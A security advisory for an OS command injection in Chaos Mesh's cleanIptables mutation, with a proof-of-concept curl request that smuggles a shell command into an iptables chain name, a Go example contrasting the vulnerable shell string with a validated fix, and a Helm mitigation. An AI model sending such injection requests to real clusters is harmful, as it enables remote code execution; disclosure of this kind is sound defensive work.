OS command injection in Chaos Mesh via the cleanIptables mutation
github.com/chaos-mesh/chaos-mesh
(,2.7.2]
The cleanIptables mutation in Chaos Controller Manager is vulnerable to OS command injection. In conjunction with CVE-2025-59358, this allows unauthenticated in-cluster attackers to perform remote code execution across the cluster.
curl -X POST -H "Content-Type: application/json" -d \
'{"query": "mutation CleanIptablesInPod {
pod(ns: \"chaos-mesh\", name: \"chaos-dashboard-5c6575bd9f-b5tqg\") {
cleanIptables(chains: [\"INPUT;touch /tmp/pwned; \", \"OUTPUT\", \"FORWARD\", \"CHAOS-MESH-INPUT\", \"CHAOS-MESH-OUTPUT\"])
}
}"}' http://controller-manager-host:10082/query
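As an added illustration, not Chaos Mesh's own code, the following hypothetical Go handler for the same operation shows the defensive pattern: validate each chain name against the character set iptables accepts and run iptables with an explicit argv instead of a shell command line, so the chain value carried by the request above is rejected before any process starts. The function names and the regex are assumptions for this example.

```go
package main

import (
	"fmt"
	"os/exec"
	"regexp"
	"strings"
)

// chainNameRe matches what iptables accepts as a chain name; anything else
// (";", spaces, quotes, "$(", ...) is rejected before it reaches a process.
var chainNameRe = regexp.MustCompile(`^[A-Za-z0-9_.-]{1,28}$`)

// ValidateChains returns an error naming the first value that is not a plain
// iptables chain name. The ";touch /tmp/pwned; " value from the advisory's
// request fails here.
func ValidateChains(chains []string) error {
	for _, c := range chains {
		if !chainNameRe.MatchString(c) {
			return fmt.Errorf("invalid iptables chain name %q", c)
		}
	}
	return nil
}

// VulnerableCommandLine is the injection-prone pattern: untrusted names
// interpolated into one string that is later handed to "sh -c".
func VulnerableCommandLine(chains []string) string {
	return "iptables -F " + strings.Join(chains, " && iptables -F ")
}

// FlushCommands builds one argv per chain with no shell involved, after
// ValidateChains has already refused anything that is not a chain name.
func FlushCommands(chains []string) ([]*exec.Cmd, error) {
	if err := ValidateChains(chains); err != nil {
		return nil, err
	}
	cmds := make([]*exec.Cmd, 0, len(chains))
	for _, c := range chains {
		cmds = append(cmds, exec.Command("iptables", "-w", "-F", c))
	}
	return cmds, nil
}

func main() {
	// Constructed input mirroring the chains argument in the advisory.
	chains := []string{"INPUT;touch /tmp/pwned; ", "OUTPUT"}
	fmt.Println("shell string:", VulnerableCommandLine(chains))
	if _, err := FlushCommands(chains); err != nil {
		fmt.Println("rejected:", err)
	}
}
```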
If upgrading Chaos Mesh to a fixed version is not possible, re-deploy the Helm chart with the chaosctl tool and its port disabled:
helm install chaos-mesh chaos-mesh/chaos-mesh -n=chaos-mesh --version 2.7.x --set enableCtrlServer=false